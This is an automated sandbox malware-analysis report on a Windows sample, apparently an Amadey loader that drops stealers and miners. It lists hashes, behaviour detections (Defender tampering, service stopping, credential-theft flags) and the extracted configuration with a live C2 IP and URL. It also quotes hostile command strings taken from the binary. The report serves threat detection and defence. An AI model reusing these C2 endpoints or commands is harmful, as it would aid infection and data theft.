File name:

ie.exe

Full analysis: https://app.any.run/tasks/514f2f33-b825-4bb7-aa13-bd580ab49266
Verdict: Malicious activity
Threats:

Amadey is a formidable Windows infostealer threat, characterized by its persistence mechanisms, modular design, and ability to execute various malicious tasks.

Analysis date: May 10, 2025, 07:20:48
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
amadey
botnet
stealer
loader
auto
generic
lumma
evasion
miner
credentialflusher
telegram
putty
rmm-tool
themida
rdp
gcleaner
antivm
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 5 sections
MD5:

C0724F752768659A9FF7FABCDA60C277

SHA1:

084384D307A00585EF6C4F0D3E8F1E6D738DAA49

SHA256:

F83E736C4D3CCB91FB8D732FF2BF13892CB73556CE1E8E55281783E6FD4B6A5F

SSDEEP:

98304:1n2NsMB/ruHZyGo8X/8qrNMPZ1QM22WFsdeUsoxgGbY2SpvTayPZ+EBnlSQFSI4L:S8exkLRc

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • GENERIC has been found (auto)

      • ie.exe (PID: 4688)
      • babed18502.exe (PID: 6372)
    • AMADEY mutex has been found

      • 2W3507.exe (PID: 2096)
      • ramez.exe (PID: 3240)
    • Adds path to the Windows Defender exclusion list

      • cmd.exe (PID: 2236)
      • NSudoLG.exe (PID: 2108)
    • Changes Windows Defender settings

      • NSudoLG.exe (PID: 2108)
      • WinTemp-v3.exe (PID: 5360)
    • Connects to the CnC server

      • ramez.exe (PID: 3240)
      • svchost.exe (PID: 2196)
      • cmd.exe (PID: 8768)
    • AMADEY has been detected (SURICATA)

      • ramez.exe (PID: 3240)
    • Known privilege escalation attack

      • dllhost.exe (PID: 5400)
    • Adds process to the Windows Defender exclusion list

      • WinTemp-v3.exe (PID: 5360)
    • Starts SC.EXE for service management

      • cmd.exe (PID: 2236)
      • cmd.exe (PID: 10952)
      • cmd.exe (PID: 11128)
    • LUMMA has been detected (SURICATA)

      • svchost.exe (PID: 2196)
    • AMADEY has been detected (YARA)

      • ramez.exe (PID: 3240)
    • Uses Task Scheduler to autorun other applications

      • WinTemp-v3.exe (PID: 5360)
    • Starts REAGENTC.EXE to disable the Windows Recovery Environment

      • ReAgentc.exe (PID: 2428)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 664)
      • powershell.exe (PID: 8928)
      • powershell.exe (PID: 8920)
      • powershell.exe (PID: 12400)
    • Changes powershell execution policy

      • cmd.exe (PID: 8240)
    • MINER has been detected (SURICATA)

      • cmd.exe (PID: 8768)
    • Uses Task Scheduler to run other applications

      • cmd.exe (PID: 6724)
    • Possible tool for stealing has been detected

      • firefox.exe (PID: 1628)
      • 025bbbe2e0.exe (PID: 8636)
      • firefox.exe (PID: 9556)
      • firefox.exe (PID: 9308)
      • firefox.exe (PID: 11316)
      • firefox.exe (PID: 12252)
    • Executing a file with an untrusted certificate

      • 150905c671.exe (PID: 7976)
      • babed18502.exe (PID: 6372)
      • core.exe (PID: 8660)
    • GCLEANER has been detected (SURICATA)

      • babed18502.exe (PID: 6372)
  • SUSPICIOUS

    • Starts a Microsoft application from unusual location

      • ie.exe (PID: 4688)
      • 150905c671.exe (PID: 7976)
    • Process drops legitimate windows executable

      • ie.exe (PID: 4688)
      • cmd.exe (PID: 2236)
      • ramez.exe (PID: 3240)
    • Executable content was dropped or overwritten

      • ie.exe (PID: 4688)
      • 1m75c4.exe (PID: 2244)
      • 2W3507.exe (PID: 2096)
      • ramez.exe (PID: 3240)
      • Unlocker.exe (PID: 7872)
      • otxb4XB.exe (PID: 8180)
      • 7z.exe (PID: 7440)
      • cmd.exe (PID: 2236)
      • WinTemp-v3.exe (PID: 5360)
      • F4WXLzT.exe (PID: 2040)
      • rundll32.exe (PID: 8328)
      • powershell.exe (PID: 8920)
      • 97d11a216f.exe (PID: 9568)
      • 97d11a216f.tmp (PID: 9604)
      • 7z.exe (PID: 7416)
      • F4WXLzT.exe (PID: 5404)
      • babed18502.exe (PID: 6372)
    • Drops 7-zip archiver for unpacking

      • 1m75c4.exe (PID: 2244)
    • Reads security settings of Internet Explorer

      • 1m75c4.exe (PID: 2244)
      • nircmd.exe (PID: 6644)
      • ramez.exe (PID: 3240)
      • 2W3507.exe (PID: 2096)
      • Unlocker.exe (PID: 7460)
      • Unlocker.exe (PID: 7872)
      • Unlocker.exe (PID: 6760)
    • Starts CMD.EXE for commands execution

      • 1m75c4.exe (PID: 2244)
      • cmd.exe (PID: 5376)
      • cmd.exe (PID: 1676)
      • nircmd.exe (PID: 6644)
      • NSudoLG.exe (PID: 1764)
      • cmd.exe (PID: 5200)
      • cmd.exe (PID: 2236)
      • Unlocker.exe (PID: 7460)
      • Unlocker.exe (PID: 7872)
      • Unlocker.exe (PID: 6760)
      • WinTemp-v3.exe (PID: 5360)
      • ramez.exe (PID: 3240)
      • e14ba8a1cd.exe (PID: 8560)
      • cmd.exe (PID: 2416)
      • 87657ff2a9.exe (PID: 8324)
      • nircmd.exe (PID: 5212)
      • cmd.exe (PID: 7556)
      • cmd.exe (PID: 9032)
      • 862fe2c2fe.exe (PID: 7436)
      • NSudoLG.exe (PID: 9872)
      • nircmd.exe (PID: 9096)
      • cmd.exe (PID: 8368)
      • cmd.exe (PID: 10120)
      • NSudoLG.exe (PID: 11216)
      • cmd.exe (PID: 9744)
      • cmd.exe (PID: 11128)
      • cmd.exe (PID: 10952)
      • Unlocker.exe (PID: 8852)
      • Unlocker.exe (PID: 8588)
      • Unlocker.exe (PID: 11948)
      • Unlocker.exe (PID: 8656)
    • The process creates files with name similar to system file names

      • 1m75c4.exe (PID: 2244)
    • Executing commands from a ".bat" file

      • cmd.exe (PID: 5376)
      • 1m75c4.exe (PID: 2244)
      • nircmd.exe (PID: 6644)
      • cmd.exe (PID: 1676)
      • NSudoLG.exe (PID: 1764)
      • cmd.exe (PID: 5200)
      • e14ba8a1cd.exe (PID: 8560)
      • cmd.exe (PID: 2416)
      • cmd.exe (PID: 7556)
      • nircmd.exe (PID: 5212)
      • 862fe2c2fe.exe (PID: 7436)
      • cmd.exe (PID: 9032)
      • nircmd.exe (PID: 9096)
      • NSudoLG.exe (PID: 9872)
      • cmd.exe (PID: 8368)
      • cmd.exe (PID: 10120)
      • cmd.exe (PID: 9744)
      • NSudoLG.exe (PID: 11216)
    • Application launched itself

      • cmd.exe (PID: 5376)
      • cmd.exe (PID: 1676)
      • cmd.exe (PID: 5200)
      • cmd.exe (PID: 2236)
      • F4WXLzT.exe (PID: 2040)
      • cmd.exe (PID: 2416)
      • cmd.exe (PID: 7556)
      • cmd.exe (PID: 9032)
      • cmd.exe (PID: 8368)
      • cmd.exe (PID: 10120)
      • cmd.exe (PID: 11128)
      • cmd.exe (PID: 9744)
      • cmd.exe (PID: 10952)
    • Starts application with an unusual extension

      • cmd.exe (PID: 5680)
      • cmd.exe (PID: 6112)
      • cmd.exe (PID: 2236)
      • cmd.exe (PID: 8760)
      • cmd.exe (PID: 4880)
      • cmd.exe (PID: 896)
      • cmd.exe (PID: 8624)
      • cmd.exe (PID: 11128)
      • cmd.exe (PID: 10952)
    • Reads the BIOS version

      • 2W3507.exe (PID: 2096)
      • ramez.exe (PID: 3240)
      • fV8FBMo.exe (PID: 7596)
    • The executable file from the user directory is run by the CMD process

      • nircmd.exe (PID: 6644)
      • NSudoLG.exe (PID: 1764)
      • NSudoLG.exe (PID: 2108)
      • 7z.exe (PID: 7440)
      • Unlocker.exe (PID: 7460)
      • Unlocker.exe (PID: 7872)
      • Unlocker.exe (PID: 6760)
      • nircmd.exe (PID: 5212)
      • NSudoLG.exe (PID: 9872)
      • nircmd.exe (PID: 9096)
      • NSudoLG.exe (PID: 11216)
      • 7z.exe (PID: 7416)
      • Unlocker.exe (PID: 8588)
      • Unlocker.exe (PID: 8852)
      • 7z.exe (PID: 9748)
      • Unlocker.exe (PID: 11948)
      • Unlocker.exe (PID: 8656)
    • Reads the date of Windows installation

      • nircmd.exe (PID: 6644)
      • Unlocker.exe (PID: 7460)
      • Unlocker.exe (PID: 7872)
    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 6112)
      • cmd.exe (PID: 2236)
      • cmd.exe (PID: 896)
      • cmd.exe (PID: 11128)
      • cmd.exe (PID: 8624)
      • cmd.exe (PID: 10952)
    • Starts itself from another location

      • 2W3507.exe (PID: 2096)
    • Get information on the list of running processes

      • cmd.exe (PID: 2236)
      • cmd.exe (PID: 6112)
      • cmd.exe (PID: 10952)
      • cmd.exe (PID: 9840)
      • cmd.exe (PID: 5376)
      • cmd.exe (PID: 11128)
    • PowerShell delay command usage (probably sleep evasion)

      • powershell.exe (PID: 1244)
    • Script adds exclusion path to Windows Defender

      • NSudoLG.exe (PID: 2108)
      • WinTemp-v3.exe (PID: 5360)
    • Starts POWERSHELL.EXE for commands execution

      • NSudoLG.exe (PID: 2108)
      • WinTemp-v3.exe (PID: 5360)
      • F4WXLzT.exe (PID: 5404)
      • cmd.exe (PID: 8240)
      • cmd.exe (PID: 8208)
      • mshta.exe (PID: 3768)
    • Contacting a server suspected of hosting an CnC

      • ramez.exe (PID: 3240)
      • svchost.exe (PID: 2196)
    • Potential Corporate Privacy Violation

      • ramez.exe (PID: 3240)
      • cmd.exe (PID: 8768)
      • powershell.exe (PID: 8920)
      • babed18502.exe (PID: 6372)
    • Process requests binary or script from the Internet

      • ramez.exe (PID: 3240)
      • powershell.exe (PID: 8920)
    • Connects to the server without a host name

      • ramez.exe (PID: 3240)
      • powershell.exe (PID: 8920)
      • babed18502.exe (PID: 6372)
    • Using 'findstr.exe' to search for text patterns in files and output

      • cmd.exe (PID: 2236)
      • cmd.exe (PID: 10952)
      • cmd.exe (PID: 11128)
    • Windows service management via SC.EXE

      • sc.exe (PID: 7584)
      • sc.exe (PID: 7820)
      • sc.exe (PID: 7840)
      • sc.exe (PID: 7776)
      • sc.exe (PID: 7984)
      • sc.exe (PID: 5868)
      • sc.exe (PID: 7740)
      • sc.exe (PID: 7800)
      • sc.exe (PID: 7816)
      • sc.exe (PID: 7860)
      • sc.exe (PID: 1600)
      • sc.exe (PID: 8048)
      • sc.exe (PID: 2632)
      • sc.exe (PID: 5380)
      • sc.exe (PID: 2800)
      • sc.exe (PID: 4488)
      • sc.exe (PID: 4068)
      • sc.exe (PID: 5772)
      • sc.exe (PID: 2444)
      • sc.exe (PID: 8036)
      • sc.exe (PID: 632)
      • sc.exe (PID: 7344)
      • sc.exe (PID: 7888)
      • sc.exe (PID: 2516)
      • sc.exe (PID: 7736)
      • sc.exe (PID: 7928)
      • sc.exe (PID: 7856)
      • sc.exe (PID: 8160)
      • sc.exe (PID: 5304)
      • sc.exe (PID: 5592)
      • sc.exe (PID: 4560)
      • sc.exe (PID: 1012)
      • sc.exe (PID: 8028)
      • sc.exe (PID: 2772)
      • sc.exe (PID: 7348)
      • sc.exe (PID: 4740)
      • sc.exe (PID: 2908)
      • sc.exe (PID: 7376)
      • sc.exe (PID: 7948)
      • sc.exe (PID: 3676)
      • sc.exe (PID: 2804)
      • sc.exe (PID: 10096)
      • sc.exe (PID: 10876)
      • sc.exe (PID: 6980)
      • sc.exe (PID: 9272)
      • sc.exe (PID: 10824)
      • sc.exe (PID: 8212)
      • sc.exe (PID: 10036)
      • sc.exe (PID: 10108)
      • sc.exe (PID: 9628)
      • sc.exe (PID: 10812)
      • sc.exe (PID: 10192)
      • sc.exe (PID: 9780)
      • sc.exe (PID: 9856)
      • sc.exe (PID: 8396)
      • sc.exe (PID: 4200)
      • sc.exe (PID: 10736)
      • sc.exe (PID: 11200)
      • sc.exe (PID: 8572)
      • sc.exe (PID: 9064)
      • sc.exe (PID: 6892)
      • sc.exe (PID: 10588)
      • sc.exe (PID: 6908)
      • sc.exe (PID: 10132)
      • sc.exe (PID: 9804)
      • sc.exe (PID: 10516)
      • sc.exe (PID: 11260)
      • sc.exe (PID: 10432)
      • sc.exe (PID: 9396)
      • sc.exe (PID: 6852)
      • sc.exe (PID: 10592)
      • sc.exe (PID: 11060)
      • sc.exe (PID: 11244)
      • sc.exe (PID: 6256)
      • sc.exe (PID: 11304)
      • sc.exe (PID: 11380)
      • sc.exe (PID: 11604)
      • sc.exe (PID: 11460)
      • sc.exe (PID: 11468)
      • sc.exe (PID: 11572)
      • sc.exe (PID: 11664)
      • sc.exe (PID: 11796)
      • sc.exe (PID: 11508)
      • sc.exe (PID: 11996)
      • sc.exe (PID: 12176)
      • sc.exe (PID: 11232)
      • sc.exe (PID: 12284)
      • sc.exe (PID: 11456)
      • sc.exe (PID: 11776)
      • sc.exe (PID: 11916)
      • sc.exe (PID: 12052)
      • sc.exe (PID: 12144)
      • sc.exe (PID: 11632)
      • sc.exe (PID: 12160)
      • sc.exe (PID: 11608)
      • sc.exe (PID: 11748)
      • sc.exe (PID: 11788)
      • sc.exe (PID: 12048)
      • sc.exe (PID: 11924)
      • sc.exe (PID: 11328)
      • sc.exe (PID: 12260)
      • sc.exe (PID: 11728)
      • sc.exe (PID: 11012)
      • sc.exe (PID: 11936)
      • sc.exe (PID: 12132)
      • sc.exe (PID: 11412)
      • sc.exe (PID: 11500)
      • sc.exe (PID: 12704)
      • sc.exe (PID: 12456)
      • sc.exe (PID: 12372)
      • sc.exe (PID: 12676)
      • sc.exe (PID: 10388)
      • sc.exe (PID: 12744)
    • Starts SC.EXE for service management

      • cmd.exe (PID: 7536)
      • cmd.exe (PID: 2236)
      • cmd.exe (PID: 7940)
      • cmd.exe (PID: 2984)
      • cmd.exe (PID: 6972)
      • cmd.exe (PID: 9620)
      • cmd.exe (PID: 10952)
      • cmd.exe (PID: 516)
      • cmd.exe (PID: 12116)
      • cmd.exe (PID: 12360)
      • cmd.exe (PID: 11128)
    • Uses TASKKILL.EXE to kill process

      • cmd.exe (PID: 7616)
      • cmd.exe (PID: 2692)
      • cmd.exe (PID: 864)
      • 025bbbe2e0.exe (PID: 8636)
      • cmd.exe (PID: 8704)
      • cmd.exe (PID: 11044)
      • cmd.exe (PID: 12488)
      • cmd.exe (PID: 13216)
    • Drops a system driver (possible attempt to evade defenses)

      • Unlocker.exe (PID: 7872)
    • Creates or modifies Windows services

      • Unlocker.exe (PID: 7872)
    • Script adds exclusion process to Windows Defender

      • WinTemp-v3.exe (PID: 5360)
    • Stops a currently running service

      • sc.exe (PID: 4452)
      • sc.exe (PID: 2092)
      • sc.exe (PID: 6064)
      • sc.exe (PID: 2404)
      • sc.exe (PID: 8120)
      • sc.exe (PID: 3396)
      • sc.exe (PID: 7176)
      • sc.exe (PID: 856)
      • sc.exe (PID: 7896)
      • sc.exe (PID: 7804)
      • sc.exe (PID: 7528)
      • sc.exe (PID: 8052)
      • sc.exe (PID: 8056)
      • sc.exe (PID: 2644)
      • sc.exe (PID: 456)
      • sc.exe (PID: 7836)
      • sc.exe (PID: 5720)
      • sc.exe (PID: 8780)
      • sc.exe (PID: 3124)
      • sc.exe (PID: 2316)
      • sc.exe (PID: 8400)
      • sc.exe (PID: 10172)
      • sc.exe (PID: 7432)
      • sc.exe (PID: 10576)
      • sc.exe (PID: 10308)
      • sc.exe (PID: 9900)
      • sc.exe (PID: 10500)
      • sc.exe (PID: 10328)
      • sc.exe (PID: 10880)
      • sc.exe (PID: 8916)
      • sc.exe (PID: 10688)
      • sc.exe (PID: 11360)
      • sc.exe (PID: 11516)
      • sc.exe (PID: 5044)
      • sc.exe (PID: 11332)
      • sc.exe (PID: 11984)
      • sc.exe (PID: 12236)
      • sc.exe (PID: 12064)
      • sc.exe (PID: 11356)
      • sc.exe (PID: 11692)
      • sc.exe (PID: 11724)
      • sc.exe (PID: 11520)
      • sc.exe (PID: 11752)
      • sc.exe (PID: 12056)
      • sc.exe (PID: 11832)
      • sc.exe (PID: 11896)
      • sc.exe (PID: 11644)
      • sc.exe (PID: 11988)
      • sc.exe (PID: 11420)
    • Deletes scheduled task without confirmation

      • schtasks.exe (PID: 7936)
      • schtasks.exe (PID: 7516)
      • schtasks.exe (PID: 7668)
      • schtasks.exe (PID: 7640)
      • schtasks.exe (PID: 7908)
      • schtasks.exe (PID: 11792)
      • schtasks.exe (PID: 12092)
      • schtasks.exe (PID: 11972)
      • schtasks.exe (PID: 11956)
      • schtasks.exe (PID: 11288)
      • schtasks.exe (PID: 11892)
      • schtasks.exe (PID: 11464)
      • schtasks.exe (PID: 4884)
      • schtasks.exe (PID: 11580)
      • schtasks.exe (PID: 12224)
    • Starts NET.EXE to display or manage information about active sessions

      • F4WXLzT.exe (PID: 2040)
      • net.exe (PID: 7688)
      • F4WXLzT.exe (PID: 5404)
      • net.exe (PID: 7892)
    • There is functionality for enable RDP (YARA)

      • ramez.exe (PID: 3240)
    • Base64-obfuscated command line is found

      • F4WXLzT.exe (PID: 5404)
    • The process bypasses the loading of PowerShell profile settings

      • F4WXLzT.exe (PID: 5404)
      • cmd.exe (PID: 8240)
    • Uses ICACLS.EXE to modify access control lists

      • cmd.exe (PID: 7968)
      • cmd.exe (PID: 5680)
    • Takes ownership (TAKEOWN.EXE)

      • cmd.exe (PID: 1672)
    • Executing commands from ".cmd" file

      • ramez.exe (PID: 3240)
    • Uses powercfg.exe to modify the power settings

      • WinTemp-v3.exe (PID: 5360)
    • Hides command output

      • cmd.exe (PID: 8008)
    • Executes script without checking the security policy

      • powershell.exe (PID: 8356)
      • powershell.exe (PID: 664)
      • powershell.exe (PID: 9160)
      • powershell.exe (PID: 8928)
      • powershell.exe (PID: 12400)
    • Checks for external IP

      • svchost.exe (PID: 2196)
      • WinTemp-v3.exe (PID: 5360)
      • Rr7DaZp.exe (PID: 8864)
    • Connects to unusual port

      • WinTemp-v3.exe (PID: 5360)
      • cmd.exe (PID: 8768)
    • Possibly malicious use of IEX has been detected

      • cmd.exe (PID: 8240)
    • Probably obfuscated PowerShell command line is found

      • cmd.exe (PID: 8240)
      • cmd.exe (PID: 8208)
    • Executes as Windows Service

      • VSSVC.exe (PID: 8644)
      • cmd.exe (PID: 8208)
    • There is functionality for VM detection VMWare (YARA)

      • WinTemp-v3.exe (PID: 5360)
    • The process executes via Task Scheduler

      • ramez.exe (PID: 8544)
      • ramez.exe (PID: 10892)
      • ramez.exe (PID: 13676)
      • ramez.exe (PID: 12716)
    • There is functionality for VM detection VirtualBox (YARA)

      • WinTemp-v3.exe (PID: 5360)
    • BASE64 encoded PowerShell command has been detected

      • F4WXLzT.exe (PID: 5404)
    • Manipulates environment variables

      • powershell.exe (PID: 8920)
    • Starts process via Powershell

      • powershell.exe (PID: 8920)
    • Uses TASKKILL.EXE to kill Browsers

      • 025bbbe2e0.exe (PID: 8636)
    • Probably download files using WebClient

      • mshta.exe (PID: 3768)
    • Found IP address in command line

      • powershell.exe (PID: 8920)
    • Process communicates with Telegram (possibly using it as an attacker's C2 server)

      • MSBuild.exe (PID: 10548)
      • OpenWith.exe (PID: 9716)
    • PUTTY has been detected

      • putty.exe (PID: 10920)
    • Executes application which crashes

      • Win-v31.exe (PID: 8320)
      • find.exe (PID: 8872)
    • Invokes assembly entry point (POWERSHELL)

      • powershell.exe (PID: 8428)
  • INFO

    • Checks supported languages

      • ie.exe (PID: 4688)
      • 1m75c4.exe (PID: 2244)
      • 2W3507.exe (PID: 2096)
      • chcp.com (PID: 3096)
      • nircmd.exe (PID: 6644)
      • chcp.com (PID: 3888)
      • NSudoLG.exe (PID: 1764)
      • chcp.com (PID: 4724)
      • mode.com (PID: 6112)
      • ramez.exe (PID: 3240)
      • NSudoLG.exe (PID: 2108)
      • 7z.exe (PID: 7440)
      • Unlocker.exe (PID: 7460)
      • fOj0r8O.exe (PID: 7864)
      • Unlocker.exe (PID: 7872)
      • otxb4XB.exe (PID: 8180)
      • IObitUnlocker.exe (PID: 8148)
      • WinTemp-v3.exe (PID: 5360)
      • fV8FBMo.exe (PID: 7596)
      • Unlocker.exe (PID: 6760)
      • IObitUnlocker.exe (PID: 8012)
    • Reads the computer name

      • 1m75c4.exe (PID: 2244)
      • nircmd.exe (PID: 6644)
      • NSudoLG.exe (PID: 1764)
      • 2W3507.exe (PID: 2096)
      • NSudoLG.exe (PID: 2108)
      • ramez.exe (PID: 3240)
      • 7z.exe (PID: 7440)
      • Unlocker.exe (PID: 7460)
      • Unlocker.exe (PID: 7872)
      • IObitUnlocker.exe (PID: 8148)
      • otxb4XB.exe (PID: 8180)
      • IObitUnlocker.exe (PID: 8012)
      • fV8FBMo.exe (PID: 7596)
      • Unlocker.exe (PID: 6760)
    • Create files in a temporary directory

      • ie.exe (PID: 4688)
      • 1m75c4.exe (PID: 2244)
      • ramez.exe (PID: 3240)
      • 2W3507.exe (PID: 2096)
      • 7z.exe (PID: 7440)
      • otxb4XB.exe (PID: 8180)
    • The sample compiled with english language support

      • 1m75c4.exe (PID: 2244)
      • ie.exe (PID: 4688)
      • ramez.exe (PID: 3240)
      • Unlocker.exe (PID: 7872)
      • cmd.exe (PID: 2236)
      • 97d11a216f.tmp (PID: 9604)
    • Process checks computer location settings

      • 1m75c4.exe (PID: 2244)
      • nircmd.exe (PID: 6644)
      • 2W3507.exe (PID: 2096)
      • ramez.exe (PID: 3240)
    • Changes the display of characters in the console

      • cmd.exe (PID: 5680)
      • cmd.exe (PID: 6112)
      • cmd.exe (PID: 2236)
      • cmd.exe (PID: 8760)
      • cmd.exe (PID: 896)
      • cmd.exe (PID: 4880)
      • cmd.exe (PID: 8624)
      • cmd.exe (PID: 11128)
      • cmd.exe (PID: 10952)
    • Starts MODE.COM to configure console settings

      • mode.com (PID: 6112)
      • mode.com (PID: 11020)
      • mode.com (PID: 9516)
    • Checks operating system version

      • cmd.exe (PID: 2236)
      • cmd.exe (PID: 11128)
      • cmd.exe (PID: 10952)
    • NirSoft software is detected

      • nircmd.exe (PID: 6644)
      • nircmd.exe (PID: 5212)
      • nircmd.exe (PID: 9096)
    • Checks proxy server information

      • ramez.exe (PID: 3240)
    • Creates files or folders in the user directory

      • ramez.exe (PID: 3240)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 1244)
      • powershell.exe (PID: 6044)
      • powershell.exe (PID: 7996)
    • Reads the machine GUID from the registry

      • Unlocker.exe (PID: 7460)
      • Unlocker.exe (PID: 7872)
      • otxb4XB.exe (PID: 8180)
      • Unlocker.exe (PID: 6760)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 1244)
      • powershell.exe (PID: 6044)
      • powershell.exe (PID: 7996)
    • Checks transactions between databases Windows and Oracle

      • otxb4XB.exe (PID: 8180)
    • Reads security settings of Internet Explorer

      • dllhost.exe (PID: 5400)
    • Reads the software policy settings

      • fV8FBMo.exe (PID: 7596)
    • Themida protector has been detected

      • ramez.exe (PID: 3240)
    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 7196)
    • Application launched itself

      • firefox.exe (PID: 1628)
      • firefox.exe (PID: 8832)
      • firefox.exe (PID: 9556)
      • firefox.exe (PID: 9308)
      • firefox.exe (PID: 11316)
      • chrome.exe (PID: 12772)
      • firefox.exe (PID: 12976)
      • firefox.exe (PID: 12252)
      • chrome.exe (PID: 13240)
    • The executable file from the user directory is run by the Powershell process

      • Temp52QSONUYP5R9WHVEK7AHNRHIRA0FALK6.EXE (PID: 9288)
    • Attempting to use instant messaging service

      • MSBuild.exe (PID: 10548)
      • OpenWith.exe (PID: 9716)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Amadey

(PID) Process(3240) ramez.exe
C2185.156.72.96
URLhttp://185.156.72.96/te4h2nus/index.php
Version5.34
Options
Drop directoryd610cf342e
Drop nameramez.exe
Strings (125)%USERPROFILE%
2016
&unit=
" && timeout 1 && del
lv:
:::
og:
Comodo
d1
\0000
Doctor Web
Programs
2025
kernel32.dll
msi
-executionpolicy remotesigned -File "
os:
cmd /C RMDIR /s/q
\App
wb
Rem
CurrentBuild
Content-Type: application/x-www-form-urlencoded
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Powershell.exe
360TotalSecurity
abcdefghijklmnopqrstuvwxyz0123456789-_
------
zip
0123456789
Panda Security
-unicode-
ramez.exe
bi:
+++
e3
rundll32.exe
Avira
id:
GetNativeSystemInfo
ESET
https://
%-lu
AVAST Software
185.156.72.96
?scr=1
/k
2019
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
shutdown -s -t 0
0000043f
"
Kaspersky Lab
&&
"taskkill /f /im "
rundll32
Norton
Startup
<d>
" Content-Type: application/octet-stream
&& Exit"
Sophos
SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
e1
00000423
WinDefender
un:
<c>
dm:
POST
Main
Keyboard Layout\Preload
ar:
random
S-%lu-
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Content-Disposition: form-data; name="data"; filename="
clip.dll
sd:
av:
d610cf342e
00000422
2022
SYSTEM\ControlSet001\Services\BasicDisplay\Video
http://
st=s
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
#
Bitdefender
ps1
DefaultSettings.XResolution
|
cred.dll|clip.dll|
--
r=
vs:
------
DefaultSettings.YResolution
rb
00000419
/Plugins/
Content-Type: multipart/form-data; boundary=----
cred.dll
pc:
dll
ComputerName
ProgramData\
GET
shell32.dll
-%lu
e2
5.34
exe
" && ren
ProductName
SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
cmd
VideoID
\
.jpg
=
AVG
SOFTWARE\Microsoft\Windows NT\CurrentVersion
/quiet
/te4h2nus/index.php
No Malware configuration.

TRiD

.exe | Win32 Executable MS Visual C++ (generic) (42.2)
.exe | Win64 Executable (generic) (37.3)
.dll | Win32 Dynamic Link Library (generic) (8.8)
.exe | Win32 Executable (generic) (6)
.exe | Generic Win/DOS Executable (2.7)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2022:05:24 22:49:06+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 14.13
CodeSize: 25600
InitializedDataSize: 4518400
UninitializedDataSize: -
EntryPoint: 0x6a60
OSVersion: 10
ImageVersion: 10
SubsystemVersion: 6
Subsystem: Windows GUI
FileVersionNumber: 11.0.17763.1
ProductVersionNumber: 11.0.17763.1
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Windows NT 32-bit
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: English (U.S.)
CharacterSet: Unicode
CompanyName: Microsoft Corporation
FileDescription: Win32 Cabinet Self-Extractor
FileVersion: 11.00.17763.1 (WinBuild.160101.0800)
InternalName: Wextract
LegalCopyright: © Microsoft Corporation. All rights reserved.
OriginalFileName: WEXTRACT.EXE .MUI
ProductName: Internet Explorer
ProductVersion: 11.00.17763.1
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
848
Monitored processes
697
Malicious processes
32
Suspicious processes
33

Behavior graph

Click at the process to see the details
start #GENERIC ie.exe 1m75c4.exe cmd.exe no specs conhost.exe no specs 2w3507.exe cmd.exe no specs conhost.exe no specs chcp.com no specs reg.exe no specs nircmd.exe no specs sppextcomobj.exe no specs slui.exe cmd.exe conhost.exe no specs cmd.exe no specs conhost.exe no specs chcp.com no specs reg.exe no specs reg.exe no specs nsudolg.exe no specs cmd.exe conhost.exe no specs cmd.exe conhost.exe no specs chcp.com no specs reg.exe no specs reg.exe no specs mode.com no specs cmd.exe no specs #AMADEY ramez.exe reg.exe no specs find.exe no specs cmd.exe no specs tasklist.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs find.exe no specs nsudolg.exe no specs powershell.exe no specs conhost.exe no specs reg.exe no specs find.exe no specs cmd.exe no specs findstr.exe no specs 7z.exe unlocker.exe no specs cmd.exe no specs conhost.exe no specs sc.exe no specs cmd.exe no specs conhost.exe no specs taskkill.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs sc.exe no specs find.exe no specs sc.exe no specs sc.exe no specs foj0r8o.exe unlocker.exe cmd.exe no specs conhost.exe no specs sc.exe no specs iobitunlocker.exe no specs iobitunlocker.exe no specs otxb4xb.exe CMSTPLUA cmd.exe no specs wintemp-v3.exe conhost.exe no specs powershell.exe no specs conhost.exe no specs sc.exe no specs sc.exe no specs cmd.exe no specs conhost.exe no specs taskkill.exe no specs fv8fbmo.exe sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs powershell.exe no specs conhost.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs #LUMMA svchost.exe reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe 